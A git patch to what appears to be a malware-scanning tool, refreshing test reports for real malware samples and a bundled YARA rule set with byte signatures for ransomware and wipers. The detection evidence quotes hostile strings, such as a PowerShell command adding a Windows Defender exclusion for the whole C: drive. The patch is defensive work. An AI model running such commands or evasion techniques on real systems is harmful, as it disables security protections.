From a2c89bcd84274e1e723cea6d346f32ddd9cf40f1 Mon Sep 17 00:00:00 2001 From: Thomas Stromberg Date: Thu, 3 Oct 2024 08:39:19 -0400 Subject: [PATCH] Update 3rd party rules --- .../macOS/2023.3CX/libffmpeg.dirty.mdiff | Bin 13700 -> 13700 bytes test_data/macOS/2024.BeaverTail/Jami.json | 54 +- test_data/macOS/clean/ls.json | 12 +- test_data/npm/2024.noblox/postinstall.js.json | 35 +- test_data/python/2024.yocolor/setup.py.json | 30 +- test_data/refresh-testdata.sh | 12 +- .../windows/2024.Sharp/sharpil_RAT.exe.md | 2 +- test_data/windows/2024.aspdasdksa2/Nil.exe.md | 2 +- .../2024.aspdasdksa2/callback.bat.json | 43 +- third_party/yara/YARAForge/RELEASE | 2 +- .../yara/YARAForge/yara-rules-full.yar | 456670 ++++++++------- 11 files changed, 229568 insertions(+), 227294 deletions(-) diff --git a/test_data/macOS/2023.3CX/libffmpeg.dirty.mdiff b/test_data/macOS/2023.3CX/libffmpeg.dirty.mdiff index 5074aae53c7d988cfca9804289a8bd9c16faa889..2f5c1918b6e358b7eecd07b0bf1c1226aef261f0 100644 GIT binary patch delta 149 zcmZq4Zpq&8h*cxa#Ka;wDcLe5$n_!qm*t$iRGZ ZBZtOjBQ|v=qIGO;$p2
$s1
$s2
$s4 | +| CRITICAL | [3P/ditekshen/telegramchatbot](https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_suspicious.yar#L1293-L1308) | Detects executables using Telegram Chat Bot, by [ditekSHen](https://github.com/ditekshen/detection) | $p1
$p2
$s1
$s2
$s4 | | MEDIUM | [3P/threat_hunting/telegram](https://github.com/chainguard-dev/malcontent/blob/main/rules/yara/threat_hunting/all.yara#telegram_greyware_tool_keyword) | [references 'telegram' tool](https://github.com/mthcht/ThreatHunting-Keywords), by mthcht | $string2_telegram_greyware_tool_keyword | | MEDIUM | [data/emdedded/app/manifest](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/emdedded-app-manifest.yara#app_manifest) | [Contains embedded Microsoft Windows application manifest](https://learn.microsoft.com/en-us/cpp/build/reference/manifestuac-embeds-uac-information-in-manifest?view=msvc-170) | [requestedExecutionLevel](https://github.com/search?q=requestedExecutionLevel&type=code)
[requestedPrivileges](https://github.com/search?q=requestedPrivileges&type=code) | | MEDIUM | [net/download](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download.yara#download) | download files | [DownloadString](https://github.com/search?q=DownloadString&type=code)
[Downloads](https://github.com/search?q=Downloads&type=code) | diff --git a/test_data/windows/2024.aspdasdksa2/Nil.exe.md b/test_data/windows/2024.aspdasdksa2/Nil.exe.md index cc16914ab..28a9b4825 100644 --- a/test_data/windows/2024.aspdasdksa2/Nil.exe.md +++ b/test_data/windows/2024.aspdasdksa2/Nil.exe.md @@ -2,8 +2,8 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |----------|-------------------------------------------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| CRITICAL | [combo/degrader/edr_killer](https://github.com/chainguard-dev/malcontent/blob/main/rules/combo/degrader/edr_killer.yara#win_kill_proc) | Windows EDR/Antivirus bypass | [GetCurrentProcess](https://github.com/search?q=GetCurrentProcess&type=code)
[GetCurrentThread](https://github.com/search?q=GetCurrentThread&type=code)
[GetModuleHandle](https://github.com/search?q=GetModuleHandle&type=code)
[GetSystemTimeAsFileTime](https://github.com/search?q=GetSystemTimeAsFileTime&type=code)
[IsDebuggerPresent](https://github.com/search?q=IsDebuggerPresent&type=code)
[IsProcessorFeaturePresent](https://github.com/search?q=IsProcessorFeaturePresent&type=code)
[QueryPerformanceCounter](https://github.com/search?q=QueryPerformanceCounter&type=code)
[TerminateProcess](https://github.com/search?q=TerminateProcess&type=code)
[UnhandledExceptionFilter](https://github.com/search?q=UnhandledExceptionFilter&type=code) | | CRITICAL | [combo/degrader/win_defender](https://github.com/chainguard-dev/malcontent/blob/main/rules/combo/degrader/win_defender.yara#win_defender_exclusion) | Uses powershell to define Windows Defender exclusions | [powershell -Command "Add-MpPreference -ExclusionPath 'C:\'"](https://github.com/search?q=powershell+-Command+%22Add-MpPreference+-ExclusionPath+%27C%3A%5C%27%22&type=code) | +| HIGH | [combo/degrader/edr_killer](https://github.com/chainguard-dev/malcontent/blob/main/rules/combo/degrader/edr_killer.yara#win_kill_proc_likely) | Likely Windows EDR/Antivirus bypass | [GetCurrentProcess](https://github.com/search?q=GetCurrentProcess&type=code)
[GetCurrentThread](https://github.com/search?q=GetCurrentThread&type=code)
[GetModuleHandle](https://github.com/search?q=GetModuleHandle&type=code)
[GetSystemTimeAsFileTime](https://github.com/search?q=GetSystemTimeAsFileTime&type=code)
[IsDebuggerPresent](https://github.com/search?q=IsDebuggerPresent&type=code)
[IsProcessorFeaturePresent](https://github.com/search?q=IsProcessorFeaturePresent&type=code)
[QueryPerformanceCounter](https://github.com/search?q=QueryPerformanceCounter&type=code)
[TerminateProcess](https://github.com/search?q=TerminateProcess&type=code)
[UnhandledExceptionFilter](https://github.com/search?q=UnhandledExceptionFilter&type=code) | | HIGH | [evasion/anti/debugger](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/anti-debugger.yara#win_debugger_or_cpu) | Detects if process is being executed within a debugger or VM | [IsDebuggerPresent](https://github.com/search?q=IsDebuggerPresent&type=code)
[IsProcessorFeaturePresent](https://github.com/search?q=IsProcessorFeaturePresent&type=code)
[QueryPerformanceCounter](https://github.com/search?q=QueryPerformanceCounter&type=code)
[UnhandledExceptionFilter](https://github.com/search?q=UnhandledExceptionFilter&type=code) | | MEDIUM | [3P/threat_hunting/powershell](https://github.com/chainguard-dev/malcontent/blob/main/rules/yara/threat_hunting/all.yara#powershell_offensive_tool_keyword) | [references 'powershell' tool](https://github.com/mthcht/ThreatHunting-Keywords), by mthcht | [Add-MpPreference -ExclusionPath](https://github.com/search?q=Add-MpPreference+-ExclusionPath&type=code) | | MEDIUM | [data/emdedded/app/manifest](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/emdedded-app-manifest.yara#app_manifest) | [Contains embedded Microsoft Windows application manifest](https://learn.microsoft.com/en-us/cpp/build/reference/manifestuac-embeds-uac-information-in-manifest?view=msvc-170) | [requestedExecutionLevel](https://github.com/search?q=requestedExecutionLevel&type=code)
[requestedPrivileges](https://github.com/search?q=requestedPrivileges&type=code) | diff --git a/test_data/windows/2024.aspdasdksa2/callback.bat.json b/test_data/windows/2024.aspdasdksa2/callback.bat.json index d91ee0376..ff2892027 100644 --- a/test_data/windows/2024.aspdasdksa2/callback.bat.json +++ b/test_data/windows/2024.aspdasdksa2/callback.bat.json @@ -14,7 +14,8 @@ "RiskScore": 4, "RiskLevel": "CRITICAL", "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/combo/degrader/edr_killer.yara#edr_stopper", - "ID": "combo/degrader/edr_killer" + "ID": "combo/degrader/edr_killer", + "RuleName": "edr_stopper" }, { "Description": "Uses powershell to define Windows Defender exclusions", @@ -24,7 +25,8 @@ "RiskScore": 4, "RiskLevel": "CRITICAL", "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/combo/degrader/win_defender.yara#win_defender_exclusion", - "ID": "combo/degrader/win_defender" + "ID": "combo/degrader/win_defender", + "RuleName": "win_defender_exclusion" }, { "Description": "download files", @@ -34,7 +36,8 @@ "RiskScore": 2, "RiskLevel": "MEDIUM", "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download.yara#download", - "ID": "net/download" + "ID": "net/download", + "RuleName": "download" }, { "Description": "Uses RunAs to execute code as another user", @@ -44,7 +47,8 @@ "RiskScore": 3, "RiskLevel": "HIGH", "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/privesc/runas.yara#runas_admin", - "ID": "privesc/runas" + "ID": "privesc/runas", + "RuleName": "runas_admin" }, { "Description": "kills tasks and/or processes", @@ -54,7 +58,8 @@ "RiskScore": 2, "RiskLevel": "MEDIUM", "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/process/taskkill.yara#taskkill", - "ID": "process/taskkill" + "ID": "process/taskkill", + "RuleName": "taskkill" }, { "Description": "path reference for C:\\Windows (may be partial)", @@ -64,7 +69,8 @@ "RiskScore": 1, "RiskLevel": "LOW", "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/windows_root.yara#windows_path", - "ID": "ref/path/windows_root" + "ID": "ref/path/windows_root", + "RuleName": "windows_path" }, { "Description": "powershell", @@ -74,7 +80,8 @@ "RiskScore": 2, "RiskLevel": "MEDIUM", "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/program/powershell.yara#powershell", - "ID": "ref/program/powershell" + "ID": "ref/program/powershell", + "RuleName": "powershell" }, { "Description": "accesses hardcoded executable endpoint", @@ -84,7 +91,8 @@ "RiskScore": 3, "RiskLevel": "HIGH", "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/site/exe.yara#http_url_with_exe", - "ID": "ref/site/exe" + "ID": "ref/site/exe", + "RuleName": "http_url_with_exe" }, { "Description": "github raw user", @@ -95,7 +103,8 @@ "RiskScore": 2, "RiskLevel": "MEDIUM", "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/site/github_raw.yara#github_raw_user", - "ID": "ref/site/github_raw" + "ID": "ref/site/github_raw", + "RuleName": "github_raw_user" }, { "Description": "contains embedded HTTPS URLs", @@ -105,7 +114,8 @@ "RiskScore": 1, "RiskLevel": "LOW", "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/site/url.yara#https_url", - "ID": "ref/site/url" + "ID": "ref/site/url", + "RuleName": "https_url" }, { "Description": "Detects suspicious PowerShell code that downloads from web sites", @@ -114,12 +124,13 @@ ], "RiskScore": 4, "RiskLevel": "CRITICAL", - "RuleURL": "https://github.com/Neo23x0/signature-base/blob/c3fb6b179826dfb6bd146f4fa64fa9d7f84bc358/yara/gen_powershell_susp.yar#L52-L91", + "RuleURL": "https://github.com/Neo23x0/signature-base/blob/f448cbc9db16ac30559ce5a5c848317478569207/yara/gen_powershell_susp.yar#L52-L91", "ReferenceURL": "Internal%20Research", "RuleAuthor": "Florian Roth (Nextron Systems)", "RuleLicense": "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE", - "RuleLicenseURL": "https://github.com/Neo23x0/signature-base/blob/c3fb6b179826dfb6bd146f4fa64fa9d7f84bc358/LICENSE", - "ID": "3P/signature_base/powershell/webdownload" + "RuleLicenseURL": "https://github.com/Neo23x0/signature-base/blob/f448cbc9db16ac30559ce5a5c848317478569207/LICENSE", + "ID": "3P/signature_base/powershell/webdownload", + "RuleName": "SIGNATURE_BASE_Suspicious_Powershell_Webdownload_1" }, { "Description": "references 'powershell' tool", @@ -131,11 +142,13 @@ "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/yara/threat_hunting/all.yara#powershell_offensive_tool_keyword", "ReferenceURL": "https://github.com/mthcht/ThreatHunting-Keywords", "RuleAuthor": "mthcht", - "ID": "3P/threat_hunting/powershell" + "ID": "3P/threat_hunting/powershell", + "RuleName": "powershell_offensive_tool_keyword" } ], "RiskScore": 4, "RiskLevel": "CRITICAL" } - } + }, + "Filter": "false_positive,ignore" } diff --git a/third_party/yara/YARAForge/RELEASE b/third_party/yara/YARAForge/RELEASE index e8f2bd3ba..3745c0949 100644 --- a/third_party/yara/YARAForge/RELEASE +++ b/third_party/yara/YARAForge/RELEASE @@ -1 +1 @@ -20240908 +20240929 diff --git a/third_party/yara/YARAForge/yara-rules-full.yar b/third_party/yara/YARAForge/yara-rules-full.yar index 8fd82c762..bcce8fa94 100644 --- a/third_party/yara/YARAForge/yara-rules-full.yar +++ b/third_party/yara/YARAForge/yara-rules-full.yar @@ -12,17 +12,17 @@ * Force Exclude Importance Level: 0 * Minimum Age (in days): 0 * Minimum Score: 40 - * Creation Date: 2024-09-08 - * Number of Rules: 12049 - * Skipped: 0 (age), 218 (quality), 4 (score), 0 (importance) + * Creation Date: 2024-09-29 + * Number of Rules: 12122 + * Skipped: 0 (age), 220 (quality), 4 (score), 0 (importance) */ /* * YARA Rule Set * Repository Name: ReversingLabs * Repository: https://github.com/reversinglabs/reversinglabs-yara-rules/ - * Retrieval Date: 2024-09-08 - * Git Commit: 5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0 - * Number of Rules: 1212 + * Retrieval Date: 2024-09-29 + * Git Commit: 279bfceaa87bd83edfb1406325e3a6f4e8d46cca + * Number of Rules: 1214 * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance) * * @@ -48,8686 +48,28477 @@ LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. */ -rule REVERSINGLABS_Win32_Trojan_Caddywiper : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Win32_Ransomware_Encoded01 : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects CaddyWiper trojan." + description = "Yara rule that detects Encoded01 ransomware." author = "ReversingLabs" - id = "ad437f29-4ad8-5a88-a0b6-03de55e7375f" - date = "2022-03-15" - modified = "2022-03-15" + id = "923d987e-f888-5b6a-9ebd-ee1257124aed" + date = "2021-12-16" + modified = "2021-12-16" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/trojan/Win32.Trojan.CaddyWiper.yara#L1-L95" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "178ff4171c09866f6b303bdff234beff1116d268995ee4dc236332e472d645b1" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Encoded01.yara#L1-L141" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f6f872290f15f4c564911bb099824c47cb13164457e1bcdb02dee441bc2d6b6a" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Trojan" - tc_detection_name = "CaddyWiper" + tc_detection_type = "Ransomware" + tc_detection_name = "Encoded01" tc_detection_factor = 5 importance = 25 strings: - $destroy_if_not_controller = { - 50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 83 39 ?? 75 ?? EB ?? 8D 55 ?? 52 FF 55 ?? - C6 45 ?? 43 C6 45 ?? 3A C6 45 ?? 5C C6 45 ?? 55 C6 45 ?? 73 C6 45 ?? 65 C6 45 ?? 72 - C6 45 ?? 73 C6 45 ?? 00 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? C6 45 ?? ?? - C6 45 ?? ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 4D ?? 83 C1 ?? 89 4D ?? 83 7D - ?? ?? 73 ?? 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8A 45 ?? 04 ?? 88 45 ?? EB ?? E8 ?? - ?? ?? ?? 8B E5 5D C3 + $find_files_p1 = { + 55 8B EC 51 B9 ?? ?? ?? ?? 6A ?? 6A ?? 49 75 ?? 51 87 4D ?? 53 56 57 89 4D ?? 89 55 + ?? 89 45 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? + 64 FF 30 64 89 20 8B 45 ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 8C ?? ?? ?? ?? 8D 85 ?? ?? ?? + ?? 8B 15 ?? ?? ?? ?? 8B 12 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? + 8B 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 8E ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? + ?? 8B 55 ?? 66 83 7C 42 ?? ?? 75 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B D0 4A 8D 45 ?? E8 ?? + ?? ?? ?? 8B 7D ?? 4F 85 FF 0F 8C ?? ?? ?? ?? 47 8D 85 ?? ?? ?? ?? 50 FF 75 ?? 68 ?? + ?? ?? ?? 8B 45 ?? 8B 55 ?? FF 34 90 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? + 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? + 33 F6 46 81 FE ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 8D + 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? + 0F 84 ?? ?? ?? ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? F6 85 ?? + ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? FF 75 ?? 68 ?? + ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? + 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? + 8B 45 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8A 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 84 } - $erase_drive_data = { - C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8D 4D ?? 89 8D ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? - 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 95 ?? ?? ?? ?? 89 45 ?? 83 - 7D ?? ?? 74 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? - ?? 51 68 ?? ?? ?? ?? 8B 55 ?? 52 FF 55 ?? 8B 45 ?? 50 FF 55 ?? 8A 4D ?? 88 4D ?? 8A - 55 ?? 80 EA ?? 88 55 ?? 8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 E9 ?? 89 8D ?? ?? ?? - ?? 85 C0 0F 85 ?? ?? ?? ?? 8B E5 5D C3 + $find_files_p2 = { + C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 12 E8 ?? ?? ?? ?? 8B 95 + ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 8A 55 ?? 8B 45 ?? E8 ?? + ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? A1 + ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 89 55 ?? 6A ?? 68 ?? + ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 50 ?? 8B 00 E8 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 3B 55 ?? 75 ?? 3B 45 ?? 0F 86 ?? ?? ?? ?? EB ?? 0F 8E ?? ?? ?? ?? 83 7D ?? ?? + 75 ?? 83 7D ?? ?? 0F 86 ?? ?? ?? ?? EB ?? 0F 8E ?? ?? ?? ?? 8B 45 ?? 83 38 ?? 73 ?? + 8B 45 ?? E8 ?? ?? ?? ?? 40 03 C0 50 E8 ?? ?? ?? ?? 59 89 45 ?? 83 7D ?? ?? 0F 84 ?? + ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 40 03 C0 50 8B 45 ?? E8 ?? + ?? ?? ?? 8B D0 8B 45 ?? 59 E8 ?? ?? ?? ?? 8B 45 ?? 50 6A ?? 8D 45 ?? 50 B9 ?? ?? ?? + ?? 33 D2 33 C0 E8 ?? ?? ?? ?? 8B D0 8B 45 ?? E8 ?? ?? ?? ?? EB ?? 8B 45 ?? E8 ?? ?? + ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 40 03 C0 50 E8 ?? ?? ?? ?? 59 89 45 ?? 83 7D ?? ?? 74 + ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 40 03 C0 50 8B 45 ?? E8 ?? ?? ?? + ?? 8B D0 8B 45 ?? 59 E8 ?? ?? ?? ?? 8B 45 ?? 50 6A ?? 8D 45 ?? 50 B9 ?? ?? ?? ?? 33 + D2 33 C0 E8 ?? ?? ?? ?? 8B D0 8B 45 ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 50 E8 ?? ?? ?? + ?? EB ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? + ?? ?? ?? 74 ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 8A 45 ?? 50 8A 45 ?? 50 FF 75 ?? 68 ?? ?? + ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B + 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 83 F8 ?? 1B C0 + 40 84 C0 0F 85 ?? ?? ?? ?? 83 FB ?? 74 ?? 53 E8 ?? ?? ?? ?? 4F } - $erase_drives_recursively_1 = { - 55 8B EC 81 EC ?? ?? ?? ?? C7 85 ?? ?? ?? ?? FF FF FF FF C6 85 ?? ?? ?? ?? 2A C6 85 - ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 5C C6 85 ?? ?? ?? ?? 00 8D 85 ?? ?? ?? ?? 50 8B 4D - ?? 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? - ?? ?? 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? 00 00 00 00 - C6 85 ?? ?? ?? ?? 46 C6 85 ?? ?? ?? ?? 69 C6 85 ?? ?? ?? ?? 6E C6 85 ?? ?? ?? ?? 64 - C6 85 ?? ?? ?? ?? 46 C6 85 ?? ?? ?? ?? 69 C6 85 ?? ?? ?? ?? 72 C6 85 ?? ?? ?? ?? 73 - C6 85 ?? ?? ?? ?? 74 C6 85 ?? ?? ?? ?? 46 C6 85 ?? ?? ?? ?? 69 C6 85 ?? ?? ?? ?? 6C - C6 85 ?? ?? ?? ?? 65 C6 85 ?? ?? ?? ?? 41 C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 6B - C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 65 C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 72 - C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 6E C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 65 - C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 6C C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 33 - C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 32 C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 2E - C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 64 C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 6C - C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 6C C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 00 - C6 85 ?? ?? ?? ?? 00 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 E8 + $enum_resources = { + 55 8B EC 83 C4 ?? 53 56 57 8B F9 89 55 ?? 8B F0 8B 5D ?? C6 45 ?? ?? 33 C0 89 03 33 + C0 89 07 8D 45 ?? 50 8B 45 ?? 50 6A ?? 56 6A ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? + ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 89 03 83 3B ?? 74 ?? 83 3B ?? 74 ?? + C7 07 ?? ?? ?? ?? 8B 03 33 C9 8B 55 ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 8B 03 50 57 8B 45 + ?? 50 E8 ?? ?? ?? ?? 8B F0 81 FE ?? ?? ?? ?? 75 ?? 8B C3 8B 55 ?? E8 ?? ?? ?? ?? EB + ?? BE ?? ?? ?? ?? EB ?? 81 FE ?? ?? ?? ?? 74 ?? 85 F6 0F 94 45 ?? 80 7D ?? ?? 75 ?? + 8B 03 E8 ?? ?? ?? ?? 33 C0 89 03 33 C0 89 07 8B 45 ?? 50 E8 ?? ?? ?? ?? 8A 45 ?? 5F + 5E 5B 8B E5 5D C2 } - $erase_drives_recursively_2_p1 = { - 8D 45 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 8D 95 ?? - ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? - ?? ?? 75 ?? E9 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 E1 ?? 0F 84 ?? ?? ?? ?? 0F BE 95 ?? - ?? ?? ?? 83 FA ?? 75 ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? 0F BE 8D ?? ?? ?? ?? 83 F9 - ?? 75 ?? E9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 E2 ?? 75 ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? - 74 ?? E9 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? - ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? - ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? ?? 52 - E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 8D 95 ?? ?? - ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 8D 95 ?? - ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 + $remote_connection_p1 = { + BB ?? ?? ?? ?? 83 FB ?? 75 ?? 33 C0 89 45 ?? 83 FB ?? 75 ?? C7 45 ?? ?? ?? ?? ?? 8B + C6 E8 ?? ?? ?? ?? 8B C6 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 FF 33 C0 89 45 ?? 8D 45 ?? + 50 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 5A 2B C2 83 C0 + ?? 50 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 83 C2 ?? 8B 45 ?? 59 E8 ?? ?? ?? + ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 66 BA ?? + ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 5A 2B C2 50 8D 85 ?? ?? ?? ?? 8B 55 ?? + E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 66 BA ?? ?? E8 ?? ?? ?? ?? 8B D0 42 8B 45 ?? 59 E8 + ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? + 66 BA ?? ?? E8 ?? ?? ?? ?? 8B C8 49 BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 85 FF 0F + 85 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 48 0F 8E ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 45 + ?? 50 68 ?? 